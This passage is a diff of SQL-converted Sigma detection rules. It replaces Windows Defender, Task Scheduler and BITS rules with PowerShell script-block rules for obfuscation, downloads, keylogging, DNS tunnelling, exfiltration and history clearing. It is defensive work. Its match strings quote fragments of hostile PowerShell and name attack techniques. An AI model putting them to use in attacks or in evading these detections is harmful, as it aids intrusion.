[ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Deletion of Defender malware detections history for legitimate reasons" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1013')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" ], - "filename": "win_defender_history_delete.yml" + "filename": "posh_pm_alternate_powershell_hosts.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", - "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", + "attack.impact", + "attack.t1529", + "attack.g0091", + "attack.s0363" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "Windows Defender Exclusions Added", - "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", - "status": "stable", - "description": "Detects the Setting of Windows Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", + "title": "DirectorySearcher Powershell Exploitation", + "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", + "status": "test", + "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Administrator actions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" ], - "filename": "win_defender_exclusions.yml" + "filename": "posh_ps_directorysearcher.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "title": "Active Directory Computers Enumeration with Get-AdComputer", + "id": "36bed6b2-e9a0-4fff-beeb-413a92b86138", + "status": "experimental", + "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_get_adcomputer.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", + "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "status": "experimental", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_user_discovery_get_aduser.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": "Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "status": "experimental", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Suspicious PowerShell Download - Powershell Script", + "id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_susp_download.yml" }, { - "title": "Scheduled Task Executed From A Suspicious Location", - "id": "424273ea-7cf8-43a6-b712-375f925e481f", - "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Use Remove-Item to Delete File", + "id": "b8af5f36-1361-4ebe-9e76-e36128d947bf", + "status": "test", + "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '%HKCU:\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%HKLM:\\\\%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_execution_from_susp_locations.yml" + "filename": "posh_ps_remove_item_path.yml" }, { - "title": "Scheduled Task Executed Uncommon LOLBIN", - "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", + "title": "Powershell Keylogging", + "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.collection", + "attack.t1056.001" ], "falsepositives": [ - "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" + "filename": "posh_ps_keylogging.yml" }, { - "title": "Suspicious Task Added by Bitsadmin", - "id": "1ff315dc-2a3a-4b71-8dde-873818d25d39", + "title": "Suspicious Process Discovery With Get-Process", + "id": "af4c87ce-bdda-4215-b998-15220772e993", "status": "test", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "description": "Get the processes that are running on the local computer.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.discovery", + "attack.t1057" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate PowerShell scripts" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND processPath LIKE '%\\\\bitsadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_use_bitsadmin.yml" + "filename": "posh_ps_susp_get_process.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", + "title": "Add New Windows Capability - ScriptBlock", + "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" - ], - "filename": "win_bits_client_direct_ip_access.yml" - }, - { - "title": "Suspicious Uncommon Download with BITS from Suspicious TLD", - "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.execution" ], "falsepositives": [ - "Other legitimate domains used by software updaters" + "Legitimate usage of the capabilities by administartors or users. Filter accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT ((RemoteName LIKE '%.com%' ESCAPE '\\' OR RemoteName LIKE '%.azureedge.net%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "win_bits_client_uncommon_domain.yml" + "filename": "posh_ps_add_windows_capability.yml" }, { - "title": "Suspicious Task Added by Powershell", - "id": "fe3a2d49-f255-4d10-935c-bda7391108eb", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate script" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs 